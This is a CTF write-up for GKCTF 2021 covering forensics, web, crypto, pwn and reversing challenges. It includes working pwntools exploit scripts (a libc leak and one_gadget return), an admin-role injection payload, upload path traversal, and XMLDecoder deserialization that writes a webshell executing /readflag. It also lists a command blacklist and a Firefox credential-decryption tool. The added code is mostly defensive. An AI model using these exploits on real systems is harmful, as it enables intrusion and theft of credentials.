MISC
Sign-in
1. Open the capture, find the traffic for `cat /f4g`, and follow the HTTP stream.
2. Take the first string of digits, convert it from hex to text and base64-decode it: the result is empty.
3. Then take the next one further down and convert it the same way; after one base64 decode it cannot be base64-decoded again.
4. Comparing it carefully with the earlier base64 shows that this base64 is written completely back-to-front, so write a script that reverses it and decodes it, which reveals the flag with doubled characters.
import base64

# The captured base64 string, written back-to-front: reverse it, then decode each '=='-terminated part
content = list('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QIhM0QDN0Q')
content.reverse()
flag1 = "".join(content).split("==")
print(flag1)
print(base64.b64decode(flag1[0] + "=="))
print(base64.b64decode(flag1[1] + "=="))
5. Extract the flag by hand:
flag{Welc0me_GkC4F_m1siCCCCCC!}
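The hex-to-text, reverse and segment-wise base64 steps above, written as an added reusable decoder (this is not the original solve script; the sample payload is constructed from base64("flag") + base64("{ok}") and is not the challenge's data). Unlike the one-off script it re-pads each segment itself, so it also copes with segments that end in a single "=":

```python
import base64
import binascii


def hex_to_text(hex_str):
    """Step 2: the capture carried the payload as a hex string; turn it back into text."""
    return binascii.unhexlify(hex_str.strip()).decode("ascii")


def b64decode_lenient(segment):
    """Decode one base64 segment, restoring any '=' padding that was lost or mangled."""
    segment = segment.strip().rstrip("=")
    return base64.b64decode(segment + "=" * (-len(segment) % 4))


def decode_reversed_base64(text):
    """Step 4: the base64 was written back-to-front. Reverse it, then decode every
    '=='-terminated segment (the challenge concatenated two base64 strings)."""
    forward = text[::-1]
    segments = [s for s in forward.split("==") if s]
    return [b64decode_lenient(s) for s in segments]


def recover(hex_payload):
    """Whole pipeline: hex -> text -> reversed base64 -> decoded segments."""
    return decode_reversed_base64(hex_to_text(hex_payload))


if __name__ == "__main__":
    # Constructed sample: "ZmxhZw==e29rfQ==" reversed, then hex-encoded as the capture carried it.
    sample_hex = binascii.hexlify("==Qfr92e==wZhxmZ".encode()).decode()
    print(recover(sample_hex))   # [b'flag', b'{ok}']
```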
Do you know APNG?
1. A Baidu search for APNG shows it is an animated image format, so look for software that plays it properly; Firefox displays the APNG correctly: an animation of a little girl holding flowers, walking and hopping.
2. Keep searching and find a tool, apngdis, that splits the APNG into its frames.
3. Among the split frames, QR codes appear in frames 2, 10, 18 and 26.
flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}
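What apngdis does under the hood, as an added example (not the challenge's image and not apngdis's own code): walk the PNG chunk list, verify CRCs, and rebuild one standalone PNG per frame (fcTL gives the frame size, fdAT is IDAT data with a 4-byte sequence number in front). The sample APNG is constructed inline so the code runs offline; assumptions are a 1x1 grayscale image and that PLTE/tRNS/gAMA are the only shared chunks worth copying.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype, data):
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(blob):
    """Walk the chunk list, verifying every CRC (a bad CRC means a hand-edited or
    corrupted file, which is exactly what you want to notice in forensics)."""
    if blob[:8] != PNG_SIG:
        raise ValueError("not a PNG signature")
    pos = 8
    while pos < len(blob):
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in %r chunk at offset %d" % (ctype, pos))
        yield ctype, data
        pos += 12 + length


def split_apng(blob):
    """Return one standalone PNG (bytes) per frame, in file order."""
    ihdr = None
    shared = []   # PLTE/tRNS/gAMA apply to every frame and are copied into each one
    frames = []
    cur = None
    for ctype, data in iter_chunks(blob):
        if ctype == b"IHDR":
            ihdr = data
        elif ctype in (b"PLTE", b"tRNS", b"gAMA"):
            shared.append((ctype, data))
        elif ctype == b"fcTL":                      # frame control: starts a new frame
            if cur is not None:
                frames.append(cur)
            w, h = struct.unpack(">II", data[4:12])
            cur = {"w": w, "h": h, "idat": []}
        elif ctype == b"IDAT":
            if cur is None:                         # default image without fcTL: still worth a look
                w, h = struct.unpack(">II", ihdr[:8])
                cur = {"w": w, "h": h, "idat": []}
            cur["idat"].append(data)
        elif ctype == b"fdAT":                      # frame data: strip the sequence number
            cur["idat"].append(data[4:])
        elif ctype == b"IEND":
            if cur is not None:
                frames.append(cur)
    out = []
    for fr in frames:
        hdr = struct.pack(">II", fr["w"], fr["h"]) + ihdr[8:]
        png = PNG_SIG + chunk(b"IHDR", hdr)
        for t, d in shared:
            png += chunk(t, d)
        for d in fr["idat"]:
            png += chunk(b"IDAT", d)
        out.append(png + chunk(b"IEND", b""))
    return out


def frame_scanlines(png):
    """Inflate a frame's IDAT stream to the raw filtered scanlines (filter byte + pixels)."""
    return zlib.decompress(b"".join(d for t, d in iter_chunks(png) if t == b"IDAT"))


def build_sample_apng(frame_count):
    """Constructed test input (not the challenge's file): a 1x1 8-bit grayscale APNG
    with frame_count frames; frame i is a single pixel of value i*40."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    out = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"acTL", struct.pack(">II", frame_count, 0))
    seq = 0
    for i in range(frame_count):
        out += chunk(b"fcTL", struct.pack(">IIIIIHHBB", seq, 1, 1, 0, 0, 1, 10, 0, 0))
        seq += 1
        pixels = zlib.compress(b"\x00" + bytes([i * 40]))   # filter type 0 + one pixel
        if i == 0:
            out += chunk(b"IDAT", pixels)
        else:
            out += chunk(b"fdAT", struct.pack(">I", seq) + pixels)
            seq += 1
    return out + chunk(b"IEND", b"")


if __name__ == "__main__":
    for n, frame in enumerate(split_apng(build_sample_apng(4))):
        with open("frame_%02d.png" % n, "wb") as f:   # view or scan each frame separately
            f.write(frame)
```

Feed a real file in with `split_apng(open("x.apng", "rb").read())`; the frames are then ordinary PNGs that any QR scanner accepts.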
FireFox_Forensics
1. A GitHub search turns up a tool, firepwd, which decrypts the stored credentials directly and gives the flag:
https://github.com/lclevy/firepwd
GKCTF{9cf21dda-34be-4f6c-a629-9c4647981ad7}
Excel tricks
1. Open the Excel file; the sheet says "I can see the flag, can you?", so suspect something is hidden. Clicking around shows that some cells contain a 1 and others are empty; select a large range and switch the cell format to General.
2. The distribution of the 1s looks odd, so adjust the column width and fill the cells: it turns out to be a Han Xin code.
3. Scan it to get the flag:
flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}
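The "adjust column width and fill" step, done programmatically as an added example (not part of the original writeup): take the worksheet's cell values as a 2-D list and render a 1/blank grid as a scaled PBM image a phone or zbar can scan. The sample grid is constructed; reading a real sheet with openpyxl (`[[c.value for c in r] for r in ws.iter_rows()]`) is an assumption about the tooling, not something the writeup describes.

```python
def cell_is_dark(value):
    """A cell counts as a dark module when it holds 1 (number or text); blank/None is light."""
    if value is None:
        return False
    return str(value).strip() in ("1", "1.0")


def grid_to_ascii(rows):
    """Quick terminal preview: '#' for dark cells, '.' for light ones."""
    return "\n".join("".join("#" if cell_is_dark(c) else "." for c in r) for r in rows)


def grid_to_pbm(rows, scale=8):
    """Render a 2-D list of cell values as a plain PBM (P1) image, one cell per module,
    each module enlarged `scale` times so a scanner can lock onto it. Ragged rows are
    padded with light modules. Returns the PBM text; write it to a .pbm file."""
    if not rows:
        raise ValueError("empty grid")
    width = max(len(r) for r in rows)
    lines = []
    for row in rows:
        bits = ["1" if cell_is_dark(c) else "0" for c in row]
        bits += ["0"] * (width - len(bits))
        line = " ".join(b for b in bits for _ in range(scale))
        lines.extend([line] * scale)
    return "P1\n%d %d\n%s\n" % (width * scale, len(rows) * scale, "\n".join(lines))


if __name__ == "__main__":
    # Constructed sample grid, not the challenge's worksheet.
    sample = [[1, None, 1], ["", 1, ""], [1, None, 1]]
    print(grid_to_ascii(sample))
    with open("code.pbm", "w") as f:
        f.write(grid_to_pbm(sample, scale=10))
```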
Ginkgo Island's Bizarre Adventure
1. Play the game: switch survival mode to creative mode and defeat the monster at the coordinates given in the book; it drops a new book containing the flag and the next coordinates.
This gives flag{w31c0me_t0_9kctf_2021_Check_1n}
Survey
flag{787c37cc-5ec2-9aae-f9c5-c1cc624caec0}
WEB
easycms
http://bbfc2a5d-0b65-4797-a93b-d24f0bf88bf9.node3.buuoj.cn/index.php?mode=getconfig
After reading the version from this endpoint, find the source online and set it up locally.
A demo user exists.
Log in to the backend with demo/demo; this CMS verifies files before high-risk operations.
In the material rename feature you can upload a .txt file and then move it into tmp, which bypasses the file verification:
../../../../../system/tmp/giny
Then modify the template to cat the flag.
Visit the home page to get the flag.
babycat
Register a user through the register endpoint and enter the system.
The "download test" feature has an arbitrary file read; it turns out /readflag has to be executed.
Read web.xml, then read all the class files in turn.
Auditing the code shows that Gson's lenient parsing can be used to create a user whose role is admin:
payload={"data":"{\"username\":\"%s\",\"role\":'admin',\"password\":\"123\",\"role\":\"123\",'role':admin}"%(name)}
This yields the user credentials:
gPFOUvzf/123
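The parser-leniency point, as an added example in Python rather than Java/Gson (this is illustrative code, not the challenge's source): the payload above relies on the parser accepting single quotes, unquoted values and repeated keys, so that whichever copy of "role" the server checks differs from the one it stores. A strict parser rejects duplicate keys outright, and a registration handler should never take the role from the client at all.

```python
import json


class DuplicateKey(ValueError):
    pass


def _no_duplicates(pairs):
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise DuplicateKey("duplicate key %r" % key)
        seen[key] = value
    return seen


def parse_strict(text):
    """Parse JSON, refusing duplicate keys (json.loads already refuses single quotes
    and unquoted values). Lenient parsers silently let the last or first duplicate win."""
    return json.loads(text, object_pairs_hook=_no_duplicates)


def parse_lenient(text):
    """What 'last one wins' looks like: the default json.loads behaviour."""
    return json.loads(text)


def has_duplicate_keys(text):
    try:
        parse_strict(text)
        return False
    except DuplicateKey:
        return True


def is_valid_registration(text):
    """Accept only a clean body with exactly the fields a client may set.
    The role is assigned server-side, so a client-supplied 'role' is rejected."""
    try:
        obj = parse_strict(text)
    except ValueError:          # JSONDecodeError and DuplicateKey both derive from ValueError
        return False
    return set(obj) == {"username", "password"}
```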
Continue auditing.
At web2/WEB-INF/classes/com/web/servlet/uploadServlet.class
the key check in the file upload has no return after it, so the WAF is effectively useless; just write a shell.
The upload directory is not accessible, so write to static instead.
Read the flag.
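Both upload weaknesses above, the easycms move that accepted `../../../../../system/tmp/giny` and the babycat check that flagged a bad file but fell through, come down to validation that does not stop the request. An added example of the hardened shape (illustrative Python, not either project's code; the allowed-extension set and `/tmp/uploads` base are assumptions): rejection raises, so nothing after it runs, and the destination is resolved and checked against the upload root before anything is written.

```python
import os
import posixpath

ALLOWED_EXT = {".png", ".jpg", ".txt"}   # assumption: what the application means to accept


class UploadRejected(Exception):
    pass


def validate_filename(name):
    """Accept only a bare file name with an allowed extension; anything else raises.
    Raising (rather than logging and continuing) is the missing 'return'."""
    if name in ("", ".", "..") or name != posixpath.basename(name):
        raise UploadRejected("path separators or traversal in name: %r" % name)
    if ".." in name or "\x00" in name:
        raise UploadRejected("suspicious characters in name: %r" % name)
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension %r not allowed" % ext)
    return name


def safe_join(base_dir, user_path):
    """Resolve user_path under base_dir and refuse the result if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise UploadRejected("path escapes upload directory: %r" % user_path)
    return target


def handle_upload(base_dir, name, content):
    """Hardened flow: validate, resolve, then write. Returns the final path."""
    path = safe_join(base_dir, validate_filename(name))
    with open(path, "wb") as f:
        f.write(content)
    return path


def is_rejected(name):
    """Boolean form of validate_filename, handy for tests and log enrichment."""
    try:
        validate_filename(name)
        return False
    except UploadRejected:
        return True


def is_traversal(base_dir, user_path):
    """Boolean form of safe_join's escape check."""
    try:
        safe_join(base_dir, user_path)
        return False
    except UploadRejected:
        return True
```

An extension allow-list is only one layer; a server that stores uploads under a web-served directory still needs that directory configured to never execute scripts.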
babycat-revenge
Same as babycat: files can be uploaded, but here the broken WAF has been fixed, so a shell cannot be written directly.
Looking closely, the XML format is allowed.
In the login endpoint, a new database object is created on every request.
Following it, the database connection reads its configuration from db.xml, and this is done with an XMLDecoder deserialization.
The logic is now clear: first overwrite db.xml with the malicious content, then log in to trigger the deserialization.
For the deserialization, study the upload WAF: it blocks "Runtime", "exec", "ProcessBuilder", "jdbc" and "autoCommit".
A shell can be written with PrintWriter (the challenge hints at this too).
The content check can be bypassed with unicode escapes.
First overwrite db.xml.
Then request login again to trigger the deserialization and write the shell (the absolute path here was taken from babycat; forgetting to read the environment variable cost us first blood):
http://82804f15-8abb-4094-ba41-7555407568a3.node3.buuoj.cn/static/1.jsp?pwd=b&i=/readflag
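Why the keyword check on the upload could be bypassed with encoded characters, and what the detection side should do instead, as an added example (not the challenge's WAF; the sample XML is constructed): a substring match on the raw bytes never sees "Runtime" when the upload spells it with an XML character reference, whereas the same list applied to the parsed text does. The real fix is that a file the user can overwrite must never be fed to XMLDecoder; the parsed-text check is only the detection layer on top of that.

```python
import xml.etree.ElementTree as ET

BLOCKED = ("Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit")   # the upload WAF's list


def blacklist_hit_raw(xml_bytes):
    """The weak check: substring match on the raw upload."""
    text = xml_bytes.decode("utf-8", "replace")
    return [w for w in BLOCKED if w in text]


def _all_text(elem):
    """Every string an XML consumer will actually see: tag names, attribute values, text."""
    yield elem.tag
    for v in elem.attrib.values():
        yield v
    if elem.text:
        yield elem.text
    for child in elem:
        yield from _all_text(child)
        if child.tail:
            yield child.tail


def blacklist_hit_parsed(xml_bytes):
    """Same list, applied after parsing, so character references such as &#x52; are
    already resolved to the letters the XMLDecoder would act on. Unparseable input
    is reported as a hit rather than waved through."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return ["<unparseable xml>"]
    seen = set()
    for s in _all_text(root):
        for w in BLOCKED:
            if w in s:
                seen.add(w)
    return sorted(seen)


if __name__ == "__main__":
    # Constructed sample: the word is spelled with a character reference for its first letter.
    evasive = b'<config><driver>com.example.Driver</driver><note>&#x52;untime</note></config>'
    print(blacklist_hit_raw(evasive), blacklist_hit_parsed(evasive))   # [] ['Runtime']
```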
CRYPTO
Random
Python's RNG is MT19937, which has been tested to death.
Just use the randcrack module:
from hashlib import md5
from randcrack import RandCrack


def foo(l, i):
    # Split one 32-bit, one 64-bit and one 96-bit output into 32-bit words,
    # least-significant word first (the order in which getrandbits produced them)
    a = []
    a.append(l[i])
    b1 = l[i+1] >> 32
    b2 = l[i+1] & (2**32-1)
    a.append(b2)
    a.append(b1)
    b1 = l[i+2] >> 64
    b2 = (l[i+2] & (2**64-1)) >> 32
    b3 = l[i+2] & (2**32-1)
    a.append(b3)
    a.append(b2)
    a.append(b1)
    return a


with open(r'random.txt', 'r') as f:
    l = f.readlines()
l = [int(i.strip()) for i in l]
ll = []
for i in range(0, len(l), 3):
    ll += foo(l, i)
rc = RandCrack()
for i in ll:
    rc.submit(i)          # 624 consecutive 32-bit outputs recover the full state
aa = rc.predict_getrandbits(32)
print('flag{%s}' % md5(str(aa).encode()).hexdigest())
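What randcrack does internally, as an added example with no third-party dependency (not the original solve script; the victim generator is constructed inline with a fixed seed): untemper 624 consecutive 32-bit outputs to recover the MT19937 state, load it into a fresh `random.Random`, and predict the next value. `words_in_generation_order` is the general form of the writeup's `foo()` for any multiple of 32 bits. The take-away for anything that matters is `secrets`, not `random`.

```python
import random


def temper(y):
    """MT19937 output tempering (as CPython applies it to each state word)."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & 0xFFFFFFFF


def untemper(y):
    """Invert temper(): each xor-shift is undone bit-group by bit-group."""
    y ^= y >> 18
    y ^= (y << 15) & 0xEFC60000
    x = y
    for _ in range(5):                      # undo y ^= (y << 7) & 0x9D2C5680 (7 bits per pass)
        x = y ^ ((x << 7) & 0x9D2C5680)
    y = x
    x = y
    for _ in range(3):                      # undo y ^= y >> 11 (11 bits per pass)
        x = y ^ (x >> 11)
    return x & 0xFFFFFFFF


def words_in_generation_order(value, nbits):
    """getrandbits(k) for k > 32 glues 32-bit outputs together least-significant first,
    so a 64-bit number holds outputs [low, high] and a 96-bit one [low, mid, high]."""
    if nbits % 32:
        raise ValueError("this helper assumes multiples of 32 bits")
    return [(value >> (32 * i)) & 0xFFFFFFFF for i in range(nbits // 32)]


def clone_mt19937(outputs32):
    """Rebuild a random.Random holding the state that produced 624 consecutive
    32-bit outputs; its next calls equal the victim's next calls."""
    if len(outputs32) < 624:
        raise ValueError("need 624 consecutive 32-bit outputs, got %d" % len(outputs32))
    state = tuple(untemper(o) for o in outputs32[:624])
    clone = random.Random()
    clone.setstate((3, state + (624,), None))   # index 624: the next output triggers a twist
    return clone


def demo(seed=0):
    """Constructed scenario: the victim emits triples of getrandbits(32/64/96), exactly
    like random.txt; flatten them into 624 words, clone, and predict the next 32 bits."""
    victim = random.Random(seed)
    words = []
    while len(words) < 624:
        words += words_in_generation_order(victim.getrandbits(32), 32)
        words += words_in_generation_order(victim.getrandbits(64), 64)
        words += words_in_generation_order(victim.getrandbits(96), 96)
    clone = clone_mt19937(words)
    return clone.getrandbits(32), victim.getrandbits(32)   # (predicted, actual)


if __name__ == "__main__":
    print(demo(2021))
```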
RRRRsa
from Crypto.Util.number import *
from gmpy2 import gcd

e = 65537
c = 13492392717469817866883431475453770951837476241371989714683737558395769731416522300851917887957945766132864151382877462142018129852703437240533684604508379950293643294877725773675505912622208813435625177696614781601216465807569201380151669942605208425645258372134465547452376467465833013387018542999562042758
n1 = 75003557379080252219517825998990183226659117019770735080523409561757225883651040882547519748107588719498261922816865626714101556207649929655822889945870341168644508079317582220034374613066751916750036253423990673764234066999306874078424803774652754587494762629397701664706287999727238636073466137405374927829
c1 = 68111901092027813007099627893896838517426971082877204047110404787823279211508183783468891474661365139933325981191524511345219830693064573462115529345012970089065201176142417462299650761299758078141504126185921304526414911455395289228444974516503526507906721378965227166653195076209418852399008741560796631569
hint1 = 23552090716381769484990784116875558895715552896983313406764042416318710076256166472426553520240265023978449945974218435787929202289208329156594838420190890104226497263852461928474756025539394996288951828172126419569993301524866753797584032740426259804002564701319538183190684075289055345581960776903740881951
hint2 = 52723229698530767897979433914470831153268827008372307239630387100752226850798023362444499211944996778363894528759290565718266340188582253307004810850030833752132728256929572703630431232622151200855160886614350000115704689605102500273815157636476901150408355565958834764444192860513855376978491299658773170270
n2 = 114535923043375970380117920548097404729043079895540320742847840364455024050473125998926311644172960176471193602850427607899191810616953021324742137492746159921284982146320175356395325890407704697018412456350862990849606200323084717352630282539156670636025924425865741196506478163922312894384285889848355244489
c2 = 67054203666901691181215262587447180910225473339143260100831118313521471029889304176235434129632237116993910316978096018724911531011857469325115308802162172965564951703583450817489247675458024801774590728726471567407812572210421642171456850352167810755440990035255967091145950569246426544351461548548423025004
hint3 = 25590923416756813543880554963887576960707333607377889401033718419301278802157204881039116350321872162118977797069089653428121479486603744700519830597186045931412652681572060953439655868476311798368015878628002547540835719870081007505735499581449077950263721606955524302365518362434928190394924399683131242077
hint4 = 104100726926923869566862741238876132366916970864374562947844669556403268955625670105641264367038885706425427864941392601593437305258297198111819227915453081797889565662276003122901139755153002219126366611021736066016741562232998047253335141676203376521742965365133597943669838076210444485458296240951668402513

# n1: the two hint expressions agree modulo one prime factor of n1, so their
# difference shares that factor with n1 and a gcd recovers it
a = pow(2020*(hint2-212121), 202020, n1)
b = pow(2021, 202020, n1)*hint1
q1 = gcd((a - b) % n1, n1)
p = pow(c1, inverse(e, (q1-1)*(n1//q1-1)), n1)     # c1 is p encrypted under n1

# n2: same idea with hint3/hint4
a = pow(hint3, 212121, n2)*pow(2020, 212121*202020, n2) % n2
b = pow(hint4, 202020, n2)*pow(2021, 212121*202020, n2) % n2
p2 = gcd((a - b) % n2, n2)
q = pow(c2, inverse(e, (p2-1)*(n2//p2-1)), n2)     # c2 is q encrypted under n2

# p and q are the factors of the real modulus; decrypt c
m = pow(c, inverse(e, (p-1)*(q-1)), p*q)
print(long_to_bytes(m))
PWN
checkin
#coding:utf-8
# Python 2 / pwntools exploit script as used in the writeup
import sys
from pwn import *
context.log_level = 'debug'
elfelf = './login'
#context.arch='amd64'
while True:
    # try:
    elf = ELF(elfelf)
    context.arch = elf.arch
    if len(sys.argv) == 1:
        io = process(elfelf)
        # io=process([elf,'127.0.0.1','9999'])
        libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    else:
        io = remote('node3.buuoj.cn', 26961)
        libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    io.recv()
    pay = 'admin\x00\x00\x00' + p64(0x0000000000401ab3) + p64(elf.got['puts']) + p64(0x4018B5)
    io.send(pay)
    io.recv()
    io.send('admin\x00\x00\x00' + p64(0)*3 + p64(0x602400))
    # leak: read back the puts address the binary prints and compute the libc base
    libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['puts']
    libc.address = libc_base
    bin_sh_addr = libc.search('/bin/sh\x00').next()
    system_addr = libc.sym['system']
    io.recv()
    # return into the one_gadget at libc_base + 0x4527a
    pay = 'admin\x00\x00\x00'*3 + p64(0x4527a + libc_base)
    io.send(pay)
    io.recv()
    # gdb.attach(io)
    io.send('admin\x00\x00\x00'*4 + p64(0x602418))
    success('libc_base:' + hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue
demo_catroom
#coding:utf-8
# Python 2 / pwntools script as used in the writeup; it drives the provided client binary
import sys
from pwn import *
context.log_level = 'debug'
elfelf = './client'
#context.arch='amd64'
while True:
    # try:
    elf = ELF(elfelf)
    context.arch = elf.arch
    if len(sys.argv) == 1:
        # io=process(elfelf)
        # sh=process('./server')
        io = process(['./client', '117.21.200.165', '27268'])
        # libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        # one_gadget=[0x45226,0x4527a,0xf0364,0xf1207]
    else:
        # sh=ssh(host='node3.buuoj.cn', user='ctf', port=25744, password='123456')
        # io=remote('node3.buuoj.cn',28324)
        # libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]

    # menu wrappers: 1 add, 2 login, 3 show, 4 delete
    def add(a, b):
        io.sendlineafter('0 exit \n', '1')
        io.sendlineafter('\n', a)
        io.sendlineafter('\n', b)

    def login(a, b):
        io.sendlineafter('0 exit \n', '2')
        io.sendlineafter('\n', a)
        io.sendlineafter('\n', b)

    def show(a):
        io.sendlineafter('0 exit \n', '3')
        io.send(a)
        return io.recv()

    def delete(a, b):
        io.sendlineafter('0 exit \n', '4')
        io.sendlineafter('\n', a)
        io.sendlineafter('\n', b)

    add('a', 'a')
    add('b', 'b')
    add('c', 'c')
    delete('a', 'a')
    # re-add with overlong fields; afterwards the account with password 'b' answers to the name 'admin'
    add('a'*0x20, 'a'*0x28 + '\xff'*8 + 'admin')
    login('admin', 'b')
    # sh.recv()
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue
RE
QQQQT
Base58
12t4tww3r5e77
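A dependency-free Base58 decoder for the string above, as an added example (not part of the original writeup; Bitcoin alphabet assumed, which is what online decoders default to). Leading '1' characters map to leading zero bytes, which is the detail most hand-rolled decoders get wrong; the encoder is included so results round-trip.

```python
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {c: i for i, c in enumerate(ALPHABET)}


def b58decode(text):
    """Base58 (Bitcoin alphabet) -> bytes. Each leading '1' is one leading zero byte."""
    n = 0
    for ch in text:
        if ch not in _INDEX:
            raise ValueError("character %r is not in the Base58 alphabet" % ch)
        n = n * 58 + _INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading + body


def b58encode(data):
    """bytes -> Base58, the inverse of b58decode."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = ALPHABET[r] + out
    leading = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading + out


if __name__ == "__main__":
    print(b58decode("12t4tww3r5e77"))     # the string from QQQQT
```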
Crash
After restoring the Go symbol table, main restricts the flag to length 43 and the format GKCTF{}.
It then enters main_check.
The first check, main_encrypto, calls Encrypt_DesEncrypt, which in turn calls crypto_des_NewTripleDESCipher, so it is 3DES.
The key is given:
Just decrypt.
Of the remaining three checks, the first is sha256,
the second is sha512,
and the last is md5.
Brute-force them; note that each one covers 4 bytes.
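The brute force for the three hashed segments, as an added example (not the original solve script; the printable charset is an assumption and the digests in the demo are constructed, not the binary's). Hashing a flag in independent 4-byte pieces is what makes this feasible: each piece is at most len(charset)**4 digests, a few tens of millions for printable ASCII, regardless of how strong the hash is.

```python
import hashlib
import itertools
import string

PRINTABLE = string.ascii_letters + string.digits + "_{}!-"   # assumed flag charset


def digest_hex(algo, data):
    return hashlib.new(algo, data).hexdigest()


def crack_chunk(target_hex, algo, length, charset=PRINTABLE):
    """Return the `length`-byte chunk over `charset` whose `algo` digest is target_hex,
    or None if no chunk matches (chunk contains a character outside the charset)."""
    target_hex = target_hex.lower()
    for combo in itertools.product(charset.encode(), repeat=length):
        chunk = bytes(combo)
        if hashlib.new(algo, chunk).hexdigest() == target_hex:
            return chunk
    return None


def crack_segments(targets, length):
    """targets: list of (algo, hex digest) in flag order, e.g. sha256, sha512, md5.
    Returns the joined plaintext, or None if any segment could not be recovered."""
    pieces = []
    for algo, hx in targets:
        found = crack_chunk(hx, algo, length)
        if found is None:
            return None
        pieces.append(found)
    return b"".join(pieces)


if __name__ == "__main__":
    # Constructed demo with 2-byte segments so it finishes instantly; the challenge used 4.
    demo = [("sha256", digest_hex("sha256", b"GK")),
            ("sha512", digest_hex("sha512", b"CT")),
            ("md5", digest_hex("md5", b"F{"))]
    print(crack_segments(demo, 2))   # b'GKCTF{'
```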
APK-debug
TEA in the native library.
Note that the key has been changed (and so has delta, see the constant below).
Just decrypt:
#include <stdio.h>

/* TEA decryption with the constants taken from the APK's native library:
   non-standard delta, and the key {9, 7, 8, 6} instead of the original one */
void DecryptTEA(unsigned int *firstChunk, unsigned int *secondChunk, unsigned int *key)
{
    unsigned int sum = 0;
    unsigned int y = *firstChunk;
    unsigned int z = *secondChunk;
    unsigned int delta = 0x458BCD42;
    sum = delta << 5;                      /* 32 rounds * delta */
    for (int i = 0; i < 32; i++)
    {
        z -= ((y << 4) + key[2]) ^ (y + sum) ^ ((y >> 5) + key[3]);
        y -= ((z << 4) + key[0]) ^ (z + sum) ^ ((z >> 5) + key[1]);
        sum -= delta;
    }
    *firstChunk = y;
    *secondChunk = z;
}

int main(void)
{
    unsigned int key[4] = {9, 7, 8, 6};
    unsigned int data[2] = {0xF5A98FF3, 0xA21873A3};
    DecryptTEA(&data[0], &data[1], key);
    printf("0x%x 0x%x\n", data[0], data[1]);
    printf("%.8s\n", (char *)data);        /* 8 bytes, not NUL-terminated: bound the print */
    return 0;
}
For more CTF writeups, follow EDI安全.